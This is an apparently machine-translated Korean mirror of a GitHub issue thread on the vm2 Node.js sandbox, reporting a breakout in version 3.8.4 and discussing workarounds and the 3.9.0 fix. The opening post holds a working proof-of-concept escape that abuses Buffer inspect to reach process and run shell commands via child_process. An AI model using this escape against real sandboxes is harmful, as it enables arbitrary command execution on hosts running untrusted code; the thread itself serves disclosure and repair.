Vm2: 검사를 통한 브레이크 아웃

에 만든 2020년 03월 01일 · 11코멘트 · 출처: patriksimek/vm2

다음 코드를 사용하여 vm을 이스케이프하고 예를 들어 쉘에서 명령을 실행할 수 있습니다.
여기 # 187에서 이미보고되었지만 13.6.0 및 vm2 v3.8.4 노드에서 계속 작동합니다.

const {VM} = require('vm2');
const vm = new VM({
    wasm: false,
    timeout: 2000,
    sandbox: {},
    eval: false,
});

const malicious = '(' + function(){
    try { require('child_process').execSync("idea") } catch(e){}  // Not getting executed

    let buffer = {
        hexSlice: () => "",
        magic: {
            get [Symbol.for("nodejs.util.inspect.custom")](){
                throw f => f.constructor("return process")();
            }
        }
    };
    try{
        Buffer.prototype.inspect.call(buffer, 0, { customInspect: true });
    }catch(e){
        e(()=>0).mainModule.require('child_process').execSync("winver") // Actually opens winver
    }
}+')()';
vm.run(malicious)

bug confirmed

출처

unxcepted

가장 유용한 댓글

@mxschmitt 방금 3.9.0으로 출시되었습니다. 지연되어 죄송합니다.

patriksimek 에 2020년 03월 21일

👍3

모든 11 댓글

@patriksimek 이 문제는 master에서 수정되었지만 버전 3.8.4 이후 인 https://github.com/patriksimek/vm2/pull/242 와 함께 수정되었습니다. 따라서 mpn에는이 수정 사항이 없습니다.

XmiliaH 에 2020년 03월 01일

👍2

이것은 v3.8.5가 나올 때까지 열려 있습니다.

XmiliaH 에 2020년 03월 01일

ETA가 있습니까?

jan-osch 에 2020년 03월 02일

@ jan-osch @patriksimek 이 매우 비활성 인 것 같아서 모르겠습니다.

XmiliaH 에 2020년 03월 02일

@XmiliaH 귀하의 답변과 모든 기여에 감사드립니다!

이러한 원숭이 패치 해결 방법이 업데이트 된 버전이 게시 될 때까지 침입을 방지 할 것이라고 생각하십니까?

const vm = new NodeVM({
  console: 'off',
  sandbox: {
    console: consoleInterface,
    setTimeout,
    print,

    // TODO remove once vm2 fixed the breakout issue
    // Reference: https://github.com/patriksimek/vm2/issues/268
    Buffer: {
      ...Buffer,
      prototype: new Proxy(Buffer.prototype, {
        get(object, property) {
          if (property === 'inspect') {
            return () => {
              console.log('[BREAKOUT_ATTEMPT]'); // eslint-disable-line no-console
              consoleInterface.error('Nice try! This breakout attempt will be reported');
            };
          }
          return object[property];
        },
      }),
    },
  },
  require: { // here define modules that can be required
    builtin: [
      // some list
    ],
    external: [
      //...
    ],
  },
});

return vm.run(code, SCRIPT_PATH);

jan-osch 에 2020년 03월 02일

@ jan-osch 그건 좋은 영혼이 아닙니다.
1) [Symbol.for ( "nodejs.util.inspect.custom")] 키를 잊어 버렸습니다.
2) 호스트 버퍼의 프로토 타입에 쓸 수 있습니다.
3) 문제는 console.log 도이 문제를 유발하고 솔루션이 그것에 대해 아무것도하지 않는다는 것입니다.

불행히도 쉬운 해결책은 없습니다.

XmiliaH 에 2020년 03월 02일

다음은 테스트가 제대로 이루어지지 않은 일시적인 해키 수정입니다.

function hacky_fix(vm) {
    const internal = vm._internal;
    const old = internal.Decontextify.object;
    const handler = {__proto__: null};
    internal.Decontextify.object = (object, traps, deepTraps, flags, mock) => {
        const value = old(object, traps, deepTraps, flags, mock);
        const better = new Proxy(value, handler);
        internal.Decontextify.proxies.set(object, better);
        internal.Contextify.proxies.set(better, object);
        return better;
    };
}

내부 기능을 패치하므로주의해서 사용하십시오.

XmiliaH 에 2020년 03월 02일

@XmiliaH 감사합니다! 그러한 브레이크 아웃 사례에 대한 테스트 스위트가있는 프로젝트를 알고 있습니까? 조기 경보 시스템으로 CI에 몇 가지 브레이크 아웃 테스트를 추가하고 싶습니다.

jan-osch 에 2020년 03월 04일

test / vm.js에 몇 가지 테스트 케이스가 있습니다. 공격을 검색하면 사건을 찾을 수 있습니다.

XmiliaH 에 2020년 03월 04일

👍1

친근한 알림 @patriksimek 은 새 버전을 출시 할 수 있다면

mxschmitt 에 2020년 03월 18일

@mxschmitt 방금 3.9.0으로 출시되었습니다. 지연되어 죄송합니다.

patriksimek 에 2020년 03월 21일

👍3

이 페이지가 도움이 되었나요?

0 / 5 - 0 등급

Vm2: 검사를 통한 브레이크 아웃

가장 유용한 댓글

모든 11 댓글

관련 문제